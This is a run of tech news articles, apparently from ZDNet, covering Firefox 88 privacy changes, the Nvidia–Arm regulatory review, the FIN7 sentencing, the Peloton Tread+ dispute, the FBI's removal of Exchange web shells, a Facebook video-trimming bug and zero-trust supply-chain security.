Information Technology

How window.name persists between sites
Image: Mozilla
Firefox 88 was released on Monday, and among the changes is a shift in how the browser will handle the window.name property. Previously, this property persisted across the life of a tab, meaning that as a user shifted from one site to another, the value in the property remained, and data from one site could be read by another. “Tracking companies have been abusing this property to leak information, and have effectively turned it into a communication channel for transporting data between websites,” Firefox Privacy engineer Tim Huang said in a blog post. “Worse, malicious sites have been able to observe the content of window.name to gather private user data that was inadvertently leaked by another website.” Going forward, Firefox will now clear the property when shifting between sites, and if a user goes back to a site, that site’s window.name value will be restored. “Together, these dual rules for clearing and restoring window.name data effectively confine that data to the website where it was originally created, similar to how Firefox’s Total Cookie Protection confines cookies to the website where they were created,” Huang said. “This confinement is essential for preventing malicious sites from abusing window.name to gather users’ personal data.”

With the release of Firefox 88, the usage of FTP in the browser is now disabled, with the code implementing the protocol to be ripped out in Firefox 90. Clicking on an FTP link will now see Firefox attempt to pass it off to an external application. “FTP is an insecure protocol and there are no reasons to prefer it over HTTPS for downloading resources,” Mozilla software engineer Michal Novotny said last year. “Also, a part of the FTP code is very old, unsafe and hard to maintain and we found a lot of security bugs in it in the past.” Other new features in Firefox 88 included support for JavaScript in PDF forms, smooth pinch zoom via a touchpad on Linux, and screen readers no longer reading content that is visually hidden. The screenshot button was also removed from the URL bar, and developers gained a toggle to switch between raw and formatted JSON responses. Related Coverage More

The UK Secretary of State for Digital, Culture, Media and Sport Oliver Dowden issued an intervention notice on Monday that will see the nation’s Competition and Markets Authority (CMA) conduct a phase one investigation into the $40 billion purchase of Arm by Nvidia. “We want to support our thriving UK tech industry and welcome foreign investment, but it is appropriate that we properly consider the national security implications of a transaction like this,” Dowden said. The CMA will have until July 30 to prepare its report, after which the Digital Secretary can either clear the deal, gather undertakings in order to clear the deal, or refer it for a phase two investigation based on public interest or competition issues. “In reaching this decision, [Dowden considered advice received from officials across the investment security community,” a government notice said. Even though the CMA investigation was kicked off on national security grounds, it will also advise whether transferring ownership of the UK chip designer from a Japanese tech giant, in the form of Softbank, to an American one in Nvidia, would lessen competition. Speaking to journalists last week, Nvidia CEO Jensen Huang said the Arm acquisition was “going really well”. “We’re working with regulators in the US, and Europe, and Asia to explain our vision for Arm — and the vision for Arm is going to expand Arm, it’s going to expand the ecosystem, it’s going to bring more innovation to the market, and so the regulators are very supportive of it because it’s pro-competition, it’s pro-innovation, and it’s pro-choice,” he said.

Under the terms of the deal announced in September, Nvidia will pay SoftBank $12 billion in cash, and $21.5 billion in Nvidia stock, with $5 billion placed under an earn-out clause. Nvidia is not purchasing the IoT services part of Arm. Addressing recent chip supply shortages, Huang said consumers clamouring for products made on a “leading edge process” has led to semiconductor manufacturers feeling pressure. “TSMC and Samsung and Intel are feeling great demand and great pressure,” he said. “I think that we just have to recognise that leading edge process cannot be a fraction of the overall capacity of the industry, it has to be a larger percentage of it, and I think these leading edge semiconductor companies are aware of that and they’re mindful of that. “But it will take a couple of years before we get leading edge capacity to the level that that is supportive of the global demand of digital technology.” Related Coverage More

Mastercard said it will acquire Ekata for $850 million in a deal that will bolster its identity verification technology. Ekata’s application programming interfaces (APIs) and tools are used by merchants, marketplaces and financial firms across multiple industries. Ekata’s platform provides artificial intelligence enhanced risk scoring, indicators and data attributes. The purchase of Ekata will also bolster Mastercard’s digital identity and security framework. Ekata offers a bevy of identify verification services to prevent fraud. Ekata has APIs for transaction risk, account openings, merchant onboarding, risk, phone intelligence and identity checking via email, phone and address. Also see:The company also provides at set of tools to speed up manual approvals. The flagship product is Pro Insight, a software-as-a-service tool that analyzes risk and signals. 
Ekata More

A “high-level manager” of  the FIN7 hacking group has been sentenced to ten years in prison.The US Department of Justice described Ukranian national Fedir Hladyr, 35, as a systems administrator for the FIN7 hacking group.He was arrested in Germany, in 2018 at the request of U.S. law enforcement and was extradited to Seattle. In September 2019, he pleaded guilty to conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.Hladyr served as FIN7’s systems administrator and played a central role in aggregating stolen payment card information, supervising FIN7’s hackers, and maintaining the elaborate network of servers that the group used to attack and control victims’ computers, according to the Department of Justice. He also controlled the organization’s encrypted channels of communication, it said.Hladyr was sentenced to ten years in prison by a U.S. District Court in Seattle following an investigation by the Seattle Cyber Task Force of the FBI and the U.S. Attorney’s Office for the Western District of Washington, with assistance from the US Department of Justice and international agencies.”This criminal organization had more than 70 people organized into business units and teams. Some were hackers, others developed the malware installed on computers, and still others crafted the malicious emails that duped victims into infecting their company systems,” said Acting U.S. Attorney Tessa A. Gorman.”This defendant worked at the intersection of all these activities and thus bears heavy responsibility for billions in damage caused to companies and individual consumers.”

Since at least 2015, FIN7 (also referred to as Carbanak Group and the Navigator Group) has engaged in a highly sophisticated malware campaign to attack hundreds of U.S. companies, predominantly in the restaurant, gaming, and hospitality industries, the Department of Justice said. FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers which were used or sold for profit. In the United States alone, FIN7 has stolen more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations after successfully compromising each target with malware.FIN7 stole millions of bank card details from compromised PoS systems which were then used directly or sold on underground dark web forums for profit.The cyber criminal operation has been actively hacking businesses in the United States, United Kingdom, Australia, France and other countries since 2015.SEE: My stolen credit card details were used 4,500 miles away. I tried to find out how it happenedCompanies which are known to have fallen victim to FIN7 hackers include Chipotle Mexican Grill, Chili’s, Arby’s, Red Robin, and Jason’s Deli.MORE ON CYBERSECURITY More

Peloton has refuted claims made in an “urgent” US safety advisory warning of the risk to children caused by the Tread+. 

The Peloton Tread+, a treadmill that includes Internet and Bluetooth connectivity, a built-in soundbar, and display, is a product offered by Peloton designed to link to real-time exercise classes for users over 16 years of age. On April 17, the US Consumer Product Safety Commission (CPSC) released a video showing two children playing on a Tread+, one of which became temporarily trapped.  The CPSC then published a public health and safety notice to US consumers, urging users with children to “stop using the product immediately.” According to the US agency, the Peloton Tread+ has been linked to 39 incidents involving children and pets, with potential risks including abrasions and fractures. The death of a child has been recorded.  The commission has launched an investigation into the fatality, which was disclosed by Peloton in March. At the time, in a letter to users, Peloton CEO and co-founder John Foley said the company designs and builds products “with safety in mind,” but urged users to “keep children and pets away from Peloton exercise equipment at all times.” Separately, a three-year-old boy suffered head and neck injuries after becoming trapped under a Tread+, leading to what the CPSC calls “significant brain injury.”

“Peloton was shocked and devastated to learn in March that a child died while using the Tread+,” Peloton said. “Within a day of learning this news, Peloton notified CPSC. While preparing its report to CPSC, Peloton learned through a doctor’s report to CPSC’s public database that a child had experienced a brain injury. Peloton spoke to the family who reported that and the child is expected to fully recover.” “In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately,” the agency warned.  According to the CPSC, one safety incident may have occurred when a parent was using the treadmill, and it may be that “the hazard cannot be avoided simply by locking the device when not in use.”  The US agency recommends that consumers should keep their Tread+ in a locked room and other objects, such as exercise balls, should be kept well away. In response to the alert, Peloton issued its own statement branding the advisory as “misleading” and “inaccurate.” “There is no reason to stop using the Tread+, as long as all warnings and safety instructions are followed,” the company said. “Children under 16 should never use the Tread+, and members should keep children, pets, and objects away from the Tread+ at all times.”   Peloton has also asked users to detach the Safety Key when the treadmill is not in use, as this would prevent the Tread+ from being inadvertently turned on, “precisely to avoid the kind of incident that [the CPSC’s] video depicts.” Furthermore, Peloton claims that the company was willing to make a joint statement with CPSC concerning the safety worries, but the agency “unfairly characterized Peloton’s efforts to collaborate and to correct inaccuracies in CPSC’s press release as an attempt to delay.” In a follow-up note, Peloton’s CEO said there was no obstruction to the investigation, with the exception of the agency’s demands for personal data from customers that requested this information was withheld. “Peloton is disappointed that, despite its offers of collaboration, and despite the fact that the Tread+ complies with all applicable safety standards, CPSC was unwilling to engage in any meaningful discussions with Peloton before issuing its inaccurate and misleading press release,” Peloton added.  Foley says the company has “no intention” of recalling or stopping sales of the Tread+.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Last week the US Department of Justice revealed how the FBI had worked to remove malicious web shells from hundreds of computers in the United States that were running vulnerable versions of Microsoft Exchange Server. While the move will have helped keep many organisations secure, it has also raised questions about the direction of cybersecurity. Earlier this year, four zero-day vulnerabilities in Microsoft Exchange Server, which were being actively exploited by a nation-state-backed hacking operation, were uncovered. Microsoft released a critical security update to protect Exchange Server customers from cyberattacks exploiting the vulnerabilities in March, but a significant number of organisations have yet to apply the security patch.

Exchange attacks

This leaves them vulnerable to cyberattacks from a range of online attackers including nation-state groups, ransomware gangs, cryptojackers and other cyber-criminal groups that have rushed to exploit the Exchange vulnerabilities. SEE: Cybersecurity: Let’s get tactical (ZDNet/TechRepublic special feature) | Download the free PDF version (TechRepublic) The attackers exploit the vulnerabilities to place web shells – scripts and codes that enable remote administration privileges – that allow continuing unauthorised backdoor access for cyber espionage and other malicious activity. It was these web shells that the FBI launched an operation to remove. Hundreds of unmitigated web shells have been identified and removed from hundreds of systems – to such an extent that the Department of Justice says it has removed one hacking group’s remaining web shells entirely. “This operation is an example of the FBI’s commitment to combating cyber threats through our enduring federal and private sector partnerships,” said Tonya Ugoretz, acting assistant director of the FBI’s cyber division.

“Our successful action should serve as a reminder to malicious cyber actors that we will impose risk and consequences for cyber intrusions that threaten the national security and public safety of the American people and our international partners,” she added. Action was taken because of the threat the web shells posed to the organisations. The FBI says it’s attempting to provide notice to all of the organisations from which it has removed web shells, which means that the agency accessed the systems without their knowledge. Even if the intent was good – in short, helping to protect the businesses by removing the access of cyber attackers, and authorised by the courts – this is a significant step by law enforcement. “The effort by the FBI amounts to the FBI gaining access to private servers. Just that should be a full stop that the action is not OK,” says David Brumley, professor of electrical and computer engineering at Carnegie Mellon University and co-founder and CEO of ForAllSecure, a cybersecurity company. “While I understand the good intention – the FBI wants to remove the backdoor – this sets a dangerous precedent where law enforcement is given broad permission to access private servers.” In this case, accessing the networks was deemed appropriate by the courts in order to remove backdoors planted by malicious hackers and to protect the organisations from cyberattacks – but Brumley fears what he described as a “slippery slope”. “We don’t want a future where the FBI determines someone may be vulnerable, and then uses that as a pretext to gain access. Remember: the FBI has both a law enforcement and intelligence mission. It would be the same as a police officer thinking your door isn’t locked, and then using that as a pretext to enter,” he says. But there are also those who believe that the FBI’s actions in entering networks and removing web shells from compromised Microsoft Exchange servers was the right thing to do, especially when organisations are fighting a cyber battle against attackers that are much more highly resourced than they are. “I believe this involvement by the FBI is seen as much appreciated from the private sector when it comes to protecting against nation-state attacks. Right now it is as if the private sector is fighting these nation-state attacks with one hand tied behind our backs, especially when our adversaries are pulling no punches,” says Troy Gill, threat hunter and manager at security company Zix. “We will continue to see more government involved when it comes to mitigating vulnerabilities.” Other security agencies are helping organisations secure their networks against the Microsoft Exchange vulnerabilities – but not by accessing the network without anyone knowing about it first. For example, the UK’s National Cyber Security Centre (NCSC) has helped removed malware related to Exchange zero-days from over 2,300 Windows machines. This was done in partnership with the affected organisations; and the NCSC doesn’t have the powers to enter the networks of private businesses to fix vulnerabilities.

The NCSC is also actively working with organisations to help them apply the necessary security updates to protect the network from cyberattacks. And while the FBI has removed the malicious web shells, it hasn’t patched any Microsoft Exchange Server zero-day vulnerabilities or removed any additional hacking or malware tools that could’ve been placed on networks by attackers. That means that as long as they haven’t applied the patches or examined the network for potentially suspicious activity, businesses that had web shells removed from their networks are still vulnerable to additional attacks – and especially if they’re still unaware that the FBI entered the network to remove the web shells in the first place. SEE: Network security policy (TechRepublic Premium) “The FBI initiative to remove web shell code from compromised Microsoft Exchange servers may be regarded as an important milestone in fighting cybercrime. However, while this operation removes attackers’ access to these vulnerable servers, it doesn’t immediately improve their security,” explains Bob Botezatu, director of threat research and reporting at Bitdefender. “The removal of the web shell does not affect the operation of additional malware that might have been planted on the server post-compromise and also does not patch the root issue, so attackers could easily re-exploit the vulnerable server and regain web shell access to it”. A joint advisory from the FBI and CISA (Cybersecurity & Infrastructure Security Agency) has urged organisations to apply the relevant security patches and other procedures to protect their networks from attacks – but until the patches are applied, the servers are still going to remain vulnerable to cyberattacks. So while entering networks with the permission of the courts allowed the FBI to remove the immediate threat of web shells, many organisations may still not know if their network was accessed by the FBI in the first place. The debate between cybersecurity, rights to access, privacy, and whether it was the right thing to do to protect vulnerable organisations against cyberattacks is going to rumble on. “Some people may be very uneasy about this and feel that a dangerous precedent has been set. Should governments really be permitted to access and manipulate corporate computer systems, even if the reasons for doing so are ostensibly altruistic?” says Brett Callow, threat analyst and Emsisoft. “That said, the action undoubtedly avoided harm as, without it, more organizations would almost certainly have been further compromised. This is really one of those cases where you can understand why something was done and see the benefits of it having been done, but nonetheless wonder whether it should’ve been done,” he adds. Whether it should have been done or not, the incident sets a precedent – and the FBI could take similar action again. “The FBI will continue to use all tools available to us as the lead domestic law enforcement and intelligence agency to hold malicious cyber actors accountable for their actions,” said acting assistant director Ugoretz. Microsoft was approached for comment but a spokesperson said the company had nothing to add.

MORE ON CYBERSECURITY More

Facebook has resolved a coding issue in live video services that allowed attackers to effectively delete content without the consent of owners. 

On April 17, security researcher Ahmad Talahmeh published an advisory explaining how the vulnerability worked, together with Proof-of-Concept (PoC) code able to trigger an attack. Facebook’s live video allows users to broadcast and publish live streams, a feature that has been widely adopted not only by individuals but also by companies and organizations worldwide — especially during the time of the COVID-19 pandemic due to stay-at-home orders.  Owners can publish live streams through a page, group, and event. Once a broadcast has ended, users can implement video trimming to cut out unnecessary content from their streams, such as by scrubbing between to- and from- timestamps. Talahmeh found an issue with this feature that allowed live video to be trimmed on behalf of owners to the point of deletion, an unexpected behavior that could have ramifications for privacy and security.  The problem lies in trimming video to five milliseconds, according to the researcher.  “Trimming video to five milliseconds will cause the video to be 0 seconds long and the owner won’t be able to untrim it,” Talahmeh says. 

After obtaining the target live video’s ID and current user ID, code containing a packaged request for a video to be trimmed can be submitted that removes the video. Talahmeh reported his findings to the social media giant on September 25, 2020. The issue was triaged within two hours and a patch was confirmed by Facebook three days later. A bug bounty of $11,000 was issued via BountyCon 2020 and two additional bounties, $1150 and $2300, were later awarded by Facebook. The bug bounty researcher has separately detailed a way to untrim any live video on the platform, a bug bounty report worth $2875. In addition, a further security issue surrounding Facebook business pages and updates informing customers of any changes prompted by COVID-19 — such as alterations to opening times, deliveries, or access to physical outlets — was found by Talahmeh.The “Coronavirus (COVID-19) Update From {page name}” system could be updated with analyst permissions — that are normally read-only — and this report earned Talahmeh $750.  ZDNet has reached out to Facebook and we will update when we hear back.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Adopting a zero trust security strategy can better safeguard organisations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. In this second piece of a two-part feature, ZDNet looks at how businesses in Asia-Pacific can establish basic cyber hygiene as well as better data management to combat attacks from across their supply chain. There had been a spate of third-party cybersecurity attacks since the start of the year, with several businesses in Singapore and across Asia impacted by the rippling effects of such breaches.Just last month, personal details of 30,000 individuals in Singapore might have been illegally accessed following a breach that targeted a third-party vendor of job-matching organisation, Employment and Employability Institute (e2i). Earlier this year, personal data of 580,000 Singapore Airlines (SIA) frequent flyers as well as 129,000 Singtel customers also were compromised through third-party security breaches.

Acronis CEO Serguei Beloussov believed third-party attacks such as those involving Accellion and SIA could have been prevented with a zero trust architecture. He dismissed suggestions that supply chain attacks could be mitigated through a network of trusted suppliers. Noting that few of them imposed strict access, Beloussov said every supplier had employees and it took just one “untrusted” source to breach a network. Humans made mistakes and this had always been the primary challenge, he said, noting that employees would forget to follow procedures or circumvented these to make their job easier. “Zero trust isn’t just about not trusting [anyone], it’s about personal [cyber] hygiene,” said Beloussov, who likened it to not sharing toothbrushes even with one’s spouse. “Unless you have some proper measures [in place], you’ll be more often sick if you shared toothbrush.”

Security policies also should be implemented, and adhered to, with regards to how supply chains were protected, he said. Regular checks as well as vulnerability assessment and penetration testing should be carried out, he noted, stressing the need to monitor and control all suppliers. Acronis’ chief information security officer (CISO) Kevin Reed said organisations needed to know who and what were accessing their data. This meant they would have to consistently assess their partners’ trust level, and not just at the start of their business relationship when a new contract was inked, he said. “Three months after [the beginning of the partnership], they might suffer an attack and their trust level would decrease, but if you only evaluated at the start, you would not be able to catch this,” Reed said. “With zero trust, you need to re-evaluate all the time and preferably in real-time. This should apply to anything that touches your data.”Check Point’s research head Lotem Finkelstein added that security should always be a criterion against which products and suppliers were evaluated.Questions should be asked about security measures they had put in place and whether connections with these suppliers were secured, to limit the risks of engaging with them, Finkelstein said. Reed noted that prevention would play a key role. With the majority of security attacks today opportunistic, he said this meant that organisations would be able to thwart most attempts if they adopted preventive measures to decrease their probability of getting breached. “You’re not hacked because someone wants to hack you; you’re hacked because it was easy,” he added. “So if you have some level of hygiene, you raise the bar for attackers and it’s more expensive for them to hack you than another company.”Adopt best practices, replace old technologyBusinesses also could mitigate their risk by adopting better data management. CyberGRX’s CISO Dave Stapleton pointed to the attack on SITA, which impact on some airlines might be comparatively small due to the types of data shared. This could indicate good data protection practices such as data segmentation and categorisation, where not every piece of information was stored on one database and access to data was given only to facilitate specific functions. Stapleton also recommended adopting the zero trust approach as well as minimising the data organisations collected. “The data can’t be breached if you don’t have it, so don’t have it if you don’t need it,” he said, adding that there also should be transparency so customers knew exactly who would have access to their data. He also stressed the need for clear expectations about breach notifications, which he said should be included in any contract with organisations that stored or exchanged data. “Security needs to be baked in, rather than bolted on, and we’re not there yet as a society,” he said. “I fear we’re getting outpaced and we don’t have sophisticated defence to counter sophisticated attacks.”

Global pandemic opening up can of security worms

Caught by the sudden onslaught of COVID-19, most businesses lacked or had inadequate security systems in place to support remote work and now have to deal with a new reality that includes a much wider attack surface and less secured user devices.

Read More

Above all, there was need to instil basic cyber hygiene, said Benjamin Ang, senior fellow of cyber homeland defence and deputy head of Centre of Excellence for National Security (CENS). Established in April 2006, CENS is a research unit of the Nanyang Technological University’s S. Rajaratnam School of International Studies and consists of local and overseas analysts specialising in national and homeland security issues. Ang suggested that there should be fundamental checks businesses were required to implement to be given, for instance, cyber insurance coverage. This would be similar to how fire insurance required owners not store flammable materials in their property, he said. “There are good practices out there, we just need to implement them,” he noted. “And it really is about people, process, and technology. I’ve seen how even the best process and technology can be easily undone by people. People have to step up. “For one, Stapleton urged software vendors to take more care in managing patches, which should be tested before they were issued. “If you release a patch for your product that doesn’t do what you purport it to do, that’s on you. It’s a disservice to your customers and that’s a problem,” he said. “Bigger enterprises also should test all patches before pushing them to production, which will ensure they don’t break other systems and validate the effectiveness of the patch”In cases such as Accellion, which involved a 20-year-old product and ineffective patches, he said both the vendor and bigger enterprise customers then should share the blame. He also would not expect large enterprises with deeper resources to use decades-old technology, especially if its manufacturer had made clear was reaching end-of-life. The onus then was on the organisation to figure out a migration plan, he said. Doing so would be much cheaper than the potential cost of having to pay ransomware should the software vulnerabilities result in a breach, he added.Beloussov put it simply: “Nothing that is old is safe. Something that was built 20 years ago can be penetrated. You have to constantly check and update the system. It’s like being in the military…[where] in a war, if you have the latest [weapon], [the opponent] would have the latest anti-radar system [to detect it], so you have to constantly upgrade your product.”Reed added that the security industry had progressed over time. With modern programming compilers and frameworks, software these days were more secured with protection already built-in by design. However, Ang noted that businesses sometimes chose to retain older software so existing production would not be disrupted. He said he still retained a copy of Windows XP because he needed to access a handful of older applications that could only run on the aged Microsoft operating system. Organisations in older industries, such as the energy sector, typically operated industrial control systems that were more than 20 years old and upgrading these could mean taking down power systems, he said. So they would end up retaining these old equipment, he added. Teo Yi Ling, senior fellow at CENS, noted that there also was corporate inertia or an issue of cost that held organisations back from replacing ageing software. Larger organisations such as Singtel also could have more red tape and, hence, employees might have less flexibility in their ability to make changes, Teo said. However, Ang noted, a lot more could be done to enable organisations to detect abnormalities or unusual activities within their network so these could be promptly resolved. Alerts should trigger and companies should have a means to isolate or shut down the system to contain the breach, he said.He added that if attackers could not be blocked from breaching the network, there should at least be processes in place to detect and mitigate its impact. “Ultimately, the safety net is being able to detect and mitigate. Legislations are great to require [organisations] to have more checks done across their supply chain, but laws have limits,” he said. Ang explained that software and IT environments were complex, with some individuals using some 20 different applications that they could not access on the corporate network, but had running on their work laptops. In such cases, enterprises must have the ability to assess these applications and ascertain who should have the authority to do so, he said. Teo further expressed frustration that, despite frequent warning and an increase in public awareness, there still were people who would not change the default password on their connected devices. “Every time there’s a breach, we’re told we need to be vigilant, but why are we not getting better at this?” she said. “We need to stop thinking [about security] in a linear way as supply chains are [complex]. All the different players, stakeholders, and companies contribute to each node that’s connected to the supply chain and entire ecosystem. Organisations need to understand how to defend it on a granular level, determine what security-by-design looks like, and build it in.”Stapleton also expressed concern that security breaches had become so commonplace that individuals were becoming desensitised and no longer cared about the need to safeguard their data.  It was also worrying that business leaders were not prioritising security at the same rate as their adversaries, he noted. He added that CISCOs needed to claim seats on the same table that carried out executive decisions, including budgeting and strategic moves. RELATED COVERAGE More